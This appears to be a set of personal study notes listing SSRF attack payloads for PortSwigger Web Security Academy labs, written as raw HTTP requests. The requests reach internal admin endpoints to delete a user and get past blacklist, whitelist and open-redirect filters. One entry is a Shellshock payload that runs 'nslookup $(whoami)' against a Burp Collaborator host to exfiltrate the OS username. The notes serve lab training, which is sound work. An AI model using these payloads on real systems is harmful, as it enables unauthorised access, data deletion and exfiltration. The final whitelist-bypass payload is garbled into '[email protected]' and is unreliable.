![[Pasted image 20250427204008.png]]
##### Basic SSRF against local server – admin access and delete user
```http
POST /product/stock HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
stockApi=http://localhost/admin/delete?username=carlos
```
Context: SSRF via stockApi parameter to internal admin endpoint
Encoding: None
Source: [[1. Basic SSRF against the local server]]
---
##### Basic SSRF against another back-end system – scan internal network and delete user
```http
POST /product/stock HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
stockApi=http://192.168.0.X:8080/admin/delete?username=carlos
```
Context: SSRF via stockApi parameter scanning 192.168.0.X range on port 8080
Encoding: None
Source: [[2. Basic SSRF against another back-end system]]
---
##### Blind SSRF with out-of-band detection – trigger request via Referer header
```http
GET /product?productId=1 HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Referer: https://YOUR-COLLABORATOR-ID.burpcollaborator.net/
```
Context: Blind SSRF via Referer header triggering out-of-band HTTP/DNS request
Encoding: None
Source: [[3. Blind SSRF with out-of-band detection]]
---
##### SSRF with blacklist-based input filter – bypass to access admin and delete user
```http
POST /product/stock HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
stockApi=http://127.1/%2561dmin/delete?username=carlos
```
Context: SSRF via stockApi parameter bypassing blacklist with IP alias and double URL encoding
Encoding: Double URL encoding (`a` → `%2561`)
Source: [[4. SSRF with blacklist-based input filter]]
##### SSRF with filter bypass via open redirection vulnerability – access admin and delete user
```http
POST /product/stock HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
```
Context: SSRF via open redirect exploiting path parameter to bypass stockApi domain restriction
Encoding: None
Source: [[5. SSRF with filter bypass via open redirection vulnerability]]
----
##### Blind SSRF with Shellshock Exploitation – OOB DNS exfiltration of OS user
```http
GET /product?productId=1 HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
User-Agent: () { :; }; /usr/bin/nslookup $(whoami).v41dugnd8u9on3g7z1lihjz4dsrtx4.burpcollaborator.net
Referer: http://192.168.0.1:8080
```
Context: SSRF via the `Referer` header combined with Shellshock in `User-Agent` to trigger a DNS lookup back to Burp Collaborator and leak the internal OS username
Encoding: None (payload delivered raw in headers)
Source: [[6. Blind SSRF with Shellshock exploitation]]
---
##### Classic SSRF with whitelist-based input filter – bypass via double-encoded fragment in userinfo
```http
GET /product/stock HTTP/2
Host: YOUR-LAB-ID.web-security-academy.net
stockApi=http://localhost:80%
[email protected]/admin/delete?username=carlos
```
Context: SSRF via the `stockApi` parameter protected by a whitelist on `stock.weliketoshop.net`, bypassed by injecting `localhost` in the userinfo section with a double-encoded `#` to split host and path.
Encoding: Double URL encoding of `#` (`%2523` → `%23`)
Source: [[7. SSRF with whitelist-based input filter]]